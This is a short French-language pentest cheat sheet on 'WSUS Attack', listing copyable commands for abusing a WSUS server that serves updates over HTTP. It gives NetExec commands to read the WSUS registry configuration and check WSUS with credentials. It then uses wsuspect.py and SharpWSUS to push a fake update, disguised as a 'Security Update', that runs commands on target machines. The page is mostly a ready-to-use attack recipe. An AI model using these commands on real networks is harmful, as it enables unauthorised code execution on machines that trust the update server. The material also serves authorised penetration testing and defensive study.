Pre-Exploitation

WSUS Attack

Exploiter un WSUS mal configuré (HTTP) pour pousser de fausses mises à jour.

Copy command
nxc smb $TARGET -u $USER -p $PASS -x 'reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate'

Description: Lire la config WSUS : URL du serveur de mise à jour dans le registre.

Copy command
nxc smb $TARGET -u $USER -p $PASS -M wsus

Description: Module NXC pour détecter et vérifier la configuration WSUS sur la cible.

Copy command
python3 wsuspect.py -u http://$WSUS_SERVER:8530 -c whoami

Description: WSUSpect : pousser une fausse mise à jour si le serveur WSUS est en HTTP (non HTTPS).

Copy command
SharpWSUS.exe create /payload:'C:\Windows\System32\cmd.exe' /args:'/c whoami > C:\Temp\out.txt' /title:'Security Update'

Description: Créer une fausse mise à jour via SharpWSUS si on a accès au serveur WSUS.